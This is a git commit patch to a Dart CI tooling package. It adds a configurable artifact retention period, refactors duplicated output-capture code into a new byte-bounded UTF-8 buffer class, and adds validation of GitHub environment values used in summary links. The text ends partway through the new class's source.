APIs (TestResultsUtil, TestResults, TestFailure, RepoUtils methods, Utf8BoundedBuffer, exitWithCode) - Document artifact retention policy in SETUP.md Co-Authored-By: Claude Opus 4.6 --- .github/workflows/ci.yaml | 26 +- .runtime_ci/config.json | 4 +- .runtime_ci/template_versions.json | 20 +- SETUP.md | 4 + USAGE.md | 5 +- docs/cli/API_REFERENCE.md | 23 +- lib/src/cli/commands/init_command.dart | 3 + lib/src/cli/commands/test_command.dart | 172 ++++------ lib/src/cli/commands/update_command.dart | 2 +- lib/src/cli/utils/repo_utils.dart | 3 + lib/src/cli/utils/step_summary.dart | 46 ++- lib/src/cli/utils/test_results_util.dart | 23 +- lib/src/cli/utils/utf8_bounded_buffer.dart | 87 ++++++ lib/src/cli/utils/workflow_generator.dart | 38 ++- templates/config.json | 2 + templates/github/workflows/ci.skeleton.yaml | 56 ++-- test/cli_utils_test.dart | 327 +++++++++----------- 
test/workflow_generator_test.dart | 102 ++++++ 18 files changed, 571 insertions(+), 372 deletions(-) create mode 100644 lib/src/cli/utils/utf8_bounded_buffer.dart diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index debb562..48110fa 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -93,13 +93,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 @@ -155,13 +156,14 @@ jobs: # ── shared:git-config ── keep in sync with single_platform ── - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ 
secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - echo "::add-mask::${TOKEN}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + echo "::add-mask::${GH_PAT}" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" # ── shared:dart-setup ── keep in sync with single_platform ── - uses: dart-lang/setup-dart@v1.7.1 diff --git a/.runtime_ci/config.json b/.runtime_ci/config.json index 2251e38..ef03610 100644 --- a/.runtime_ci/config.json +++ b/.runtime_ci/config.json @@ -66,6 +66,7 @@ "ci": { "dart_sdk": "3.9.2", "line_length": 120, + "artifact_retention_days": 7, "personal_access_token_secret": "TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN", "features": { "proto": false, @@ -74,7 +75,8 @@ "analysis_cache": false, "managed_analyze": false, "managed_test": true, - "build_runner": true + "build_runner": true, + "web_test": false }, "secrets": {}, "sub_packages": [], diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 2e01001..544a498 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-25T02:11:44.094948Z", + 
"updated_at": "2026-02-25T03:15:47.792987Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,19 +23,19 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "f14e900c3eb2c8ee9472627688881d197b37fb801bea00fffd42fef5a1947081", - "consumer_hash": "b6b79735284de22017f27b042964dc4f51295f36752d2a340c200a27fd1e6465", - "updated_at": "2026-02-25T02:11:44.092566Z" + "hash": "387908c7364598e498743b3b34bf3784f73b9ff424518198d7fd550b5d42321b", + "consumer_hash": "6b674b7d72bd68a902fa2215f335fc89ef1c520d8edb81539d69ffb80acded23", + "updated_at": "2026-02-25T03:15:47.794152Z" }, "workflow_release": { - "hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", - "consumer_hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", - "updated_at": "2026-02-25T02:11:44.094396Z" + "hash": "dae21f893768272b85bae853c4b6d5013c6641762cf1536ea5fcce5123a0314c", + "consumer_hash": "dae21f893768272b85bae853c4b6d5013c6641762cf1536ea5fcce5123a0314c", + "updated_at": "2026-02-25T03:13:46.486887Z" }, "workflow_issue_triage": { - "hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", - "consumer_hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", - "updated_at": "2026-02-25T02:11:44.094960Z" + "hash": "229416f8f4e0a0ed87d655c2f280b616318665fa89a9aaa177de2a9ce0ccaed8", + "consumer_hash": "229416f8f4e0a0ed87d655c2f280b616318665fa89a9aaa177de2a9ce0ccaed8", + "updated_at": "2026-02-25T03:13:46.487715Z" } } } diff --git a/SETUP.md b/SETUP.md index 963d153..959a745 100644 --- a/SETUP.md +++ b/SETUP.md @@ -306,6 +306,7 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `dart_sdk` | string | **required** | Dart SDK version (e.g. 
`"3.9.2"`) | | `personal_access_token_secret` | string | `"GITHUB_TOKEN"` | GitHub secret name for PAT | | `line_length` | int/string | `120` | Line length for `dart format` checks (also controls the git pre-commit hook) | +| `artifact_retention_days` | int/string | `7` | Retention window for uploaded CI test artifacts (1-90 days) | | `features.proto` | bool | `false` | Enable protobuf generation step | | `features.lfs` | bool | `false` | Enable Git LFS checkout | | `features.format_check` | bool | `true` | Enable `dart format` check | @@ -332,6 +333,9 @@ When `features.web_test` is `true`, the `web_test` object is optional; if omitte Cross-validation rule: - If `features.web_test` is `false`, omit `web_test` or set it to `{}`. Non-empty `web_test` config with the feature disabled is treated as dead config and fails validation. +Artifact retention policy: +- CI test artifacts (logs, test-results, fixtures) default to **7 days** retention and can be overridden via `ci.artifact_retention_days` (1-90). + You can add custom steps before/after tests using user-preservable sections in the generated workflow — look for `# --- BEGIN USER: pre-test ---` and `# --- END USER: post-test ---` markers. To add additional jobs (including reusable workflow calls), diff --git a/USAGE.md b/USAGE.md index e054296..d6d85b2 100644 --- a/USAGE.md +++ b/USAGE.md @@ -141,7 +141,7 @@ dart run runtime_ci_tooling:manage_cicd init 4. Creates `.runtime_ci/config.json` with detected values (skipped if already present) 5. Creates `.runtime_ci/autodoc.json` from `lib/src/` directory structure (skipped if already present) 6. Creates a starter `CHANGELOG.md` if none exists -7. Installs `.git/hooks/pre-commit` to auto-format staged `lib/` Dart files before every commit +7. Installs `.git/hooks/pre-commit` to auto-format staged Dart files under `lib/` before every commit 8. Adds `.runtime_ci/runs/` to `.gitignore` 9. 
Prints a summary of all actions taken and suggested next steps @@ -1249,7 +1249,7 @@ final exists = await commandExists('git'); **Jobs:** 1. `pre-check` — Skip bot commits (author `github-actions[bot]` or `[skip ci]`) -2. Optional `auto-format` — If `ci.features.format_check=true`, auto-format `lib/` and push `bot(format)` commit +2. Optional `auto-format` — If `ci.features.format_check=true`, runs `dart format --line-length .`, stages tracked `*.dart` updates, and pushes a `bot(format)` commit 3. **Single-platform mode** (default, `ci.platforms` missing or 1 entry): - `analyze-and-test` — Verify protos, run analysis, run tests 4. **Multi-platform mode** (`ci.platforms` has 2+ entries): @@ -1266,6 +1266,7 @@ final exists = await commandExists('git'); - `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via SHA-pinned `browser-actions/setup-chrome@v2.1.1` and runs `dart test -p chrome`. Configure via `ci.web_test`: - `concurrency` (1–32, default `1`): parallel test shards - `paths`: list of relative repo paths (e.g. `["test/web/"]`): paths are normalized, shell-quoted, and validated (no traversal, no shell metacharacters). Empty list = run all tests +- `ci.artifact_retention_days`: Optional retention period for uploaded test artifacts (1–90, default `7`) **Key steps:** ```yaml diff --git a/docs/cli/API_REFERENCE.md b/docs/cli/API_REFERENCE.md index 8673faa..8b463b3 100644 --- a/docs/cli/API_REFERENCE.md +++ b/docs/cli/API_REFERENCE.md @@ -109,6 +109,7 @@ All commands extend `Command` from the `args` package. - **TestCommand** - `name`: `'test'` - `description`: 'Run dart test.' + - `runWithRoot(String repoRoot)`: `static Future` - Execute managed tests against an explicit repository root. 
- **UpdateAllCommand** / **UpdateCommand** - `name`: `'update'` / `'update-all'` @@ -233,6 +234,9 @@ if (isGitInstalled) { - `warn(String msg)`: `static void` - `error(String msg)`: `static void` +- **Exit Utilities** + - `exitWithCode(int code)`: `Future` - Flushes stdout/stderr and then exits. + ### Release & Versioning - **ReleaseUtils** - `buildReleaseCommitMessage(...)`: `static String` @@ -269,17 +273,32 @@ if (isGitInstalled) { - `resolveToolingPackageRoot()`: `static String` - **RepoUtils** - `findRepoRoot()`: `static String?` + - `resolveTestLogDir(String repoRoot, {Map? environment})`: `static String` + - `isSymlinkPath(String path)`: `static bool` + - `ensureSafeDirectory(String dirPath)`: `static void` + - `writeFileSafely(String filePath, String content, {FileMode mode = FileMode.write})`: `static void` - **StepSummary** - - `write(String markdown)`: `static void` + - `write(String markdown, {Map? environment})`: `static void` - `artifactLink([String label = 'View all artifacts'])`: `static String` - `compareLink(String prevTag, String newTag, [String? label])`: `static String` - `ghLink(String label, String path)`: `static String` - `releaseLink(String tag)`: `static String` - `escapeHtml(String input)`: `static String` - `collapsible(String title, String content, {bool open = false})`: `static String` +- **TestFailure** + - Parsed failure record from NDJSON test output. + - Fields: `name`, `error`, `stackTrace`, `printOutput`, `durationMs`. +- **TestResults** + - Parsed aggregate test results. + - Fields: `passed`, `failed`, `skipped`, `totalDurationMs`, `failures`, `parsed`. - **TestResultsUtil** - `parseTestResultsJson(String jsonPath)`: `static TestResults` - - `writeTestJobSummary(TestResults results, int exitCode)`: `static void` + - `writeTestJobSummary(TestResults results, int exitCode, {String? platformId, void Function(String markdown)? 
writeSummary})`: `static void` +- **Utf8BoundedBuffer** + - `Utf8BoundedBuffer({required int maxBytes, required String truncationSuffix})` + - `append(String data)`: `void` + - `truncateToUtf8Bytes(String input, int maxBytes)`: `static String` + - `byteLength`, `isTruncated`, `isEmpty` - **TemplateResolver** - `resolvePackageRoot()`: `static String` - `resolveTemplatesDir()`: `static String` diff --git a/lib/src/cli/commands/init_command.dart b/lib/src/cli/commands/init_command.dart index cf9422f..ce162d6 100644 --- a/lib/src/cli/commands/init_command.dart +++ b/lib/src/cli/commands/init_command.dart @@ -134,6 +134,7 @@ class InitCommand extends Command { 'dart_sdk': '3.9.2', 'personal_access_token_secret': 'GITHUB_TOKEN', 'line_length': 120, + 'artifact_retention_days': 7, 'features': { 'proto': false, 'lfs': false, @@ -141,6 +142,8 @@ class InitCommand extends Command { 'analysis_cache': true, 'managed_analyze': true, 'managed_test': true, + 'build_runner': false, + 'web_test': false, }, 'secrets': {}, 'sub_packages': [], diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 7c9b602..00df5c1 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -12,6 +12,7 @@ import '../utils/repo_utils.dart'; import '../utils/step_summary.dart'; import '../utils/test_results_util.dart'; import '../utils/sub_package_utils.dart'; +import '../utils/utf8_bounded_buffer.dart'; /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). 
@@ -55,17 +56,7 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - late final String logDir; - try { - logDir = RepoUtils.resolveTestLogDir(repoRoot); - RepoUtils.ensureSafeDirectory(logDir); - } on StateError catch (e) { - Logger.error('$e'); - await exitWithCode(1); - } on FileSystemException catch (e) { - Logger.error('Cannot use log directory: $e'); - await exitWithCode(1); - } + final logDir = await _resolveLogDirOrExit(repoRoot); Logger.info('Log directory: $logDir'); final jsonPath = p.join(logDir, 'results.json'); @@ -98,52 +89,19 @@ class TestCommand extends Command { final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing - // (byte-bounded to prevent OOM from runaway test output) - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - var stdoutBytes = 0; - var stderrBytes = 0; - var stdoutTruncated = false; - var stderrTruncated = false; + // (byte-bounded to prevent OOM from runaway test output). const truncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; - final truncationBytes = utf8.encode(truncationSuffix).length; + final stdoutBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: truncationSuffix); + final stderrBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: truncationSuffix); void onStdout(String data) { stdout.write(data); - if (stdoutTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { - stdoutBuf.write(data); - stdoutBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stdoutBytes - truncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? 
remaining : bytes.length; - stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stdoutBuf.write(truncationSuffix); - stdoutTruncated = true; - } + stdoutBuf.append(data); } void onStderr(String data) { stderr.write(data); - if (stderrTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stderrBytes + dataBytes <= _maxLogBufferBytes) { - stderrBuf.write(data); - stderrBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stderrBytes - truncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stderrBuf.write(truncationSuffix); - stderrTruncated = true; - } + stderrBuf.append(data); } final stdoutSub = process.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onStdout); @@ -175,7 +133,7 @@ class TestCommand extends Command { // Write console output to log files try { RepoUtils.writeFileSafely(p.join(logDir, 'dart_stdout.log'), stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { + if (!stderrBuf.isEmpty) { RepoUtils.writeFileSafely(p.join(logDir, 'dart_stderr.log'), stderrBuf.toString()); } } on FileSystemException catch (e) { @@ -249,7 +207,13 @@ class TestCommand extends Command { } final spLogDir = p.join(logDir, name); - Directory(spLogDir).createSync(recursive: true); + try { + RepoUtils.ensureSafeDirectory(spLogDir); + } on FileSystemException catch (e) { + Logger.error('Cannot use sub-package log directory for $name: $e'); + failures.add(name); + continue; + } final spJsonPath = p.join(spLogDir, 'results.json'); final spExpandedPath = p.join(spLogDir, 'expanded.txt'); @@ -268,51 +232,18 @@ class TestCommand extends Command { final spProcess = await Process.start(Platform.resolvedExecutable, spTestArgs, workingDirectory: dir); - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - var 
stdoutBytes = 0; - var stderrBytes = 0; - var stdoutTruncated = false; - var stderrTruncated = false; const spTruncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; - final spTruncationBytes = utf8.encode(spTruncationSuffix).length; + final stdoutBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: spTruncationSuffix); + final stderrBuf = Utf8BoundedBuffer(maxBytes: _maxLogBufferBytes, truncationSuffix: spTruncationSuffix); void onSpStdout(String data) { stdout.write(data); - if (stdoutTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { - stdoutBuf.write(data); - stdoutBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stdoutBytes - spTruncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? remaining : bytes.length; - stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stdoutBuf.write(spTruncationSuffix); - stdoutTruncated = true; - } + stdoutBuf.append(data); } void onSpStderr(String data) { stderr.write(data); - if (stderrTruncated) return; - final dataBytes = utf8.encode(data).length; - if (stderrBytes + dataBytes <= _maxLogBufferBytes) { - stderrBuf.write(data); - stderrBytes += dataBytes; - } else { - final remaining = _maxLogBufferBytes - stderrBytes - spTruncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? 
remaining : bytes.length; - stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - stderrBuf.write(spTruncationSuffix); - stderrTruncated = true; - } + stderrBuf.append(data); } final stdoutSub = spProcess.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onSpStdout); @@ -340,7 +271,7 @@ class TestCommand extends Command { try { RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stdout.log'), stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { + if (!stderrBuf.isEmpty) { RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stderr.log'), stderrBuf.toString()); } } on FileSystemException catch (e) { @@ -383,47 +314,42 @@ class TestCommand extends Command { workingDirectory: workingDirectory, environment: {'GIT_LFS_SKIP_SMUDGE': '1'}, ); - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - final stdoutBytes = [0]; - final stderrBytes = [0]; - final stdoutTruncated = [false]; - final stderrTruncated = [false]; const pubGetTruncationSuffix = '\n\n... (output truncated).'; - final pubGetTruncationBytes = utf8.encode(pubGetTruncationSuffix).length; - - void capWrite(StringBuffer buf, String data, int maxBytes, List truncated, List byteCount) { - if (truncated[0]) return; - final dataBytes = utf8.encode(data).length; - if (byteCount[0] + dataBytes <= maxBytes) { - buf.write(data); - byteCount[0] += dataBytes; - } else { - final remaining = maxBytes - byteCount[0] - pubGetTruncationBytes; - if (remaining > 0) { - final bytes = utf8.encode(data); - final toTake = bytes.length > remaining ? 
remaining : bytes.length; - buf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); - } - buf.write(pubGetTruncationSuffix); - truncated[0] = true; - } - } + final stdoutBuf = Utf8BoundedBuffer(maxBytes: _maxPubGetBufferBytes, truncationSuffix: pubGetTruncationSuffix); + final stderrBuf = Utf8BoundedBuffer(maxBytes: _maxPubGetBufferBytes, truncationSuffix: pubGetTruncationSuffix); + final stdoutDone = Completer(); + final stderrDone = Completer(); final stdoutSub = process.stdout .transform(Utf8Decoder(allowMalformed: true)) - .listen((data) => capWrite(stdoutBuf, data, _maxPubGetBufferBytes, stdoutTruncated, stdoutBytes)); + .listen( + (data) => stdoutBuf.append(data), + onDone: () => stdoutDone.complete(), + onError: (_) => stdoutDone.complete(), + ); final stderrSub = process.stderr .transform(Utf8Decoder(allowMalformed: true)) - .listen((data) => capWrite(stderrBuf, data, _maxPubGetBufferBytes, stderrTruncated, stderrBytes)); + .listen( + (data) => stderrBuf.append(data), + onDone: () => stderrDone.complete(), + onError: (_) => stderrDone.complete(), + ); try { final exitCode = await process.exitCode.timeout(timeout); + await Future.wait([ + stdoutDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + stderrDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + ]); await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); return ProcessResult(process.pid, exitCode, stdoutBuf.toString(), stderrBuf.toString()); } on TimeoutException { onTimeout?.call(); await _killAndAwaitExit(process); try { + await Future.wait([ + stdoutDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + stderrDone.future.timeout(const Duration(seconds: 5), onTimeout: () {}), + ]); await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); } catch (_) {} return null; @@ -448,4 +374,18 @@ class TestCommand extends Command { } return -1; } + + static Future _resolveLogDirOrExit(String repoRoot) async { + try { + final logDir = 
RepoUtils.resolveTestLogDir(repoRoot); + RepoUtils.ensureSafeDirectory(logDir); + return logDir; + } on StateError catch (e) { + Logger.error('$e'); + await exitWithCode(1); + } on FileSystemException catch (e) { + Logger.error('Cannot use log directory: $e'); + await exitWithCode(1); + } + } } diff --git a/lib/src/cli/commands/update_command.dart b/lib/src/cli/commands/update_command.dart index b6682fb..f91f052 100644 --- a/lib/src/cli/commands/update_command.dart +++ b/lib/src/cli/commands/update_command.dart @@ -527,7 +527,7 @@ class UpdateCommand extends Command { required String prefix, }) { for (final key in source.keys) { - if (key == '_comment') continue; + if (key == '_comment' || key.startsWith('_comment_')) continue; final fullKey = prefix.isEmpty ? key : '$prefix.$key'; if (!target.containsKey(key)) { diff --git a/lib/src/cli/utils/repo_utils.dart b/lib/src/cli/utils/repo_utils.dart index 57aea2b..b096ce8 100644 --- a/lib/src/cli/utils/repo_utils.dart +++ b/lib/src/cli/utils/repo_utils.dart @@ -51,6 +51,9 @@ abstract final class RepoUtils { final runnerTempRaw = env['RUNNER_TEMP']?.trim(); if (runnerTempRaw != null && runnerTempRaw.isNotEmpty) { + if (_controlChars.hasMatch(runnerTempRaw)) { + throw StateError('RUNNER_TEMP must not contain newlines or control characters'); + } final runnerTemp = p.normalize(runnerTempRaw); if (!(normalized == runnerTemp || p.isWithin(runnerTemp, normalized))) { throw StateError('TEST_LOG_DIR must be within RUNNER_TEMP: "$runnerTemp"'); diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 38f7455..7304602 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -9,6 +9,9 @@ import 'repo_utils.dart'; abstract final class StepSummary { /// Maximum safe size for $GITHUB_STEP_SUMMARY (1 MiB minus 4 KiB buffer). 
static const int _maxSummaryBytes = (1024 * 1024) - (4 * 1024); + static final RegExp _repoSlugPattern = RegExp(r'^[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+$'); + static final RegExp _numericPattern = RegExp(r'^\d+$'); + static final RegExp _refPattern = RegExp(r'^[A-Za-z0-9._/-]+$'); /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). @@ -39,33 +42,34 @@ abstract final class StepSummary { /// Build a link to the current workflow run's artifacts page. static String artifactLink([String label = 'View all artifacts']) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY']; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']); final runId = Platform.environment['GITHUB_RUN_ID']; if (repo == null || runId == null) return ''; + if (!_numericPattern.hasMatch(runId)) return ''; return '[$label]($server/$repo/actions/runs/$runId)'; } /// Build a GitHub compare link between two refs. static String compareLink(String prevTag, String newTag, [String? label]) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']) ?? '${config.repoOwner}/${config.repoName}'; final text = label ?? '$prevTag...$newTag'; return '[$text]($server/$repo/compare/$prevTag...$newTag)'; } /// Build a link to a file/path in the repository. static String ghLink(String label, String path) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? 
'${config.repoOwner}/${config.repoName}'; - final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']) ?? '${config.repoOwner}/${config.repoName}'; + final sha = _safeRef(Platform.environment['GITHUB_SHA']) ?? 'main'; return '[$label]($server/$repo/blob/$sha/$path)'; } /// Build a link to a GitHub Release by tag. static String releaseLink(String tag) { - final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; + final server = _safeGitHubServerUrl(Platform.environment['GITHUB_SERVER_URL']); + final repo = _safeRepoSlug(Platform.environment['GITHUB_REPOSITORY']) ?? '${config.repoOwner}/${config.repoName}'; return '[v$tag]($server/$repo/releases/tag/$tag)'; } @@ -91,4 +95,28 @@ abstract final class StepSummary { .replaceAll('"', '"') .replaceAll("'", '''); } + + static String _safeGitHubServerUrl(String? raw) { + if (raw == null || raw.trim().isEmpty) return 'https://github.com'; + final parsed = Uri.tryParse(raw.trim()); + if (parsed == null || !parsed.isAbsolute) return 'https://github.com'; + if (parsed.scheme != 'https' && parsed.scheme != 'http') return 'https://github.com'; + if (parsed.host.isEmpty || parsed.userInfo.isNotEmpty) return 'https://github.com'; + final cleanPath = parsed.path.endsWith('/') ? parsed.path.substring(0, parsed.path.length - 1) : parsed.path; + return '${parsed.scheme}://${parsed.host}${parsed.hasPort ? ':${parsed.port}' : ''}$cleanPath'; + } + + static String? _safeRepoSlug(String? raw) { + if (raw == null || raw.trim().isEmpty) return null; + final trimmed = raw.trim(); + if (!_repoSlugPattern.hasMatch(trimmed)) return null; + return trimmed; + } + + static String? _safeRef(String? 
raw) { + if (raw == null || raw.trim().isEmpty) return null; + final trimmed = raw.trim(); + if (!_refPattern.hasMatch(trimmed)) return null; + return trimmed; + } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart index adb1ba1..3b91503 100644 --- a/lib/src/cli/utils/test_results_util.dart +++ b/lib/src/cli/utils/test_results_util.dart @@ -240,10 +240,9 @@ abstract final class TestResultsUtil { if (f.error.isNotEmpty) { final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; buf.writeln('**Error:**'); - final safeError = StepSummary.escapeHtml(error); - final fence = _codeFence(safeError); + final fence = _codeFence(error); buf.writeln(fence); - buf.writeln(safeError); + buf.writeln(error); buf.writeln(fence); buf.writeln(); } @@ -253,10 +252,9 @@ abstract final class TestResultsUtil { ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; buf.writeln('**Stack Trace:**'); - final safeStack = StepSummary.escapeHtml(stack); - final fence = _codeFence(safeStack); + final fence = _codeFence(stack); buf.writeln(fence); - buf.writeln(safeStack); + buf.writeln(stack); buf.writeln(fence); buf.writeln(); } @@ -266,10 +264,9 @@ abstract final class TestResultsUtil { final lineCount = trimmed.split('\n').length; final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; buf.writeln('**Captured Output ($lineCount lines):**'); - final safePrint = StepSummary.escapeHtml(printPreview); - final fence = _codeFence(safePrint); + final fence = _codeFence(printPreview); buf.writeln(fence); - buf.writeln(safePrint); + buf.writeln(printPreview); buf.writeln(fence); buf.writeln(); } @@ -292,7 +289,7 @@ abstract final class TestResultsUtil { /// Returns a markdown code fence string that will not appear inside [content]. 
import 'dart:convert';

/// Collects text while enforcing a strict UTF-8 byte budget.
///
/// When appended content would exceed [maxBytes], the buffer keeps the largest
/// valid UTF-8 prefix that fits, appends [truncationSuffix] (or a prefix of it
/// if needed), and marks itself truncated. Further appends are ignored.
class Utf8BoundedBuffer {
  /// Hard upper bound, in UTF-8 encoded bytes, on the collected text
  /// (including any appended [truncationSuffix]).
  final int maxBytes;

  /// Marker appended when the budget is exceeded; may itself be cut short
  /// if the remaining budget cannot hold it in full.
  final String truncationSuffix;

  final StringBuffer _buffer = StringBuffer();
  int _byteLength = 0;
  bool _isTruncated = false;

  Utf8BoundedBuffer({required this.maxBytes, required this.truncationSuffix})
      : assert(maxBytes >= 0, 'maxBytes must be non-negative');

  /// UTF-8 byte length of the text collected so far.
  int get byteLength => _byteLength;

  /// Whether the budget was exceeded; once true, later appends are dropped.
  bool get isTruncated => _isTruncated;

  /// Whether nothing has been collected yet.
  bool get isEmpty => _buffer.isEmpty;

  /// Whether any text has been collected. Mirrors [StringBuffer.isNotEmpty]
  /// so call sites can write `buf.isNotEmpty` instead of `!buf.isEmpty`.
  bool get isNotEmpty => _buffer.isNotEmpty;

  @override
  String toString() => _buffer.toString();

